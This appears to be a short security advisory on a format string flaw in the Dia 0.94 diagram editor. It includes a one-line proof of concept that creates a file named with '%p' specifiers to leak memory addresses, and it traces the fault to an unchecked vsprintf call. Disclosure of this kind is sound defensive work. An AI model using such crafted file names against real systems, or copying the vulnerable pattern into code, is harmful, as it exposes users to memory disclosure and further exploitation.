DIA file name handling format string

[king_purba () yahoo co uk]

Author : KaDaL-X
http://kandangjamur.net

Software tested
Dia v 0.94 on fedora Core 4
Dia v 0.94 on Mandriva
http://www.gnome.org/projects/dia

PoC :
------
[ph03n1x@kaiten ~]$ touch %p%p%p%p.bmp

Now, open %p%p%p%p.bmp using dia then error something like this will happen

Failed to load:
Couldn't recognize the image file format for file 
'0xbfec1a480xc0cf670x89608b00x9f247e.bmp'

Code analisys:
--------------
in plug-ins/pixbuf/pixbuf.c line 152

 else if (error) /* otherwise a pixbuf misbehaviour */
 {
      message_warning ("Failed to load:\n%s", error->message);
      g_error_free (error);
 }

then in lib/message.c line 220

message_warning(const char *format, ...)
{
  va_list args, args2;

  va_start (args, format);
  va_start (args2, format);
  message_internal(_("Warning"), format, &args, &args2);
  va_end (args);
  va_end (args2);
}

On lib/message.c line 187 message_internal has been defined as

static MessageInternal message_internal = gtk_message_internal;

Now, analizyng gtk_message_internal() function on lib/message.c on line 
157
vsprintf() function was used incorrectly

vsprintf (buf, fmt, *args2);

The second argument of vsprintf must be a constant string, based on 
/usr/include/stdio.h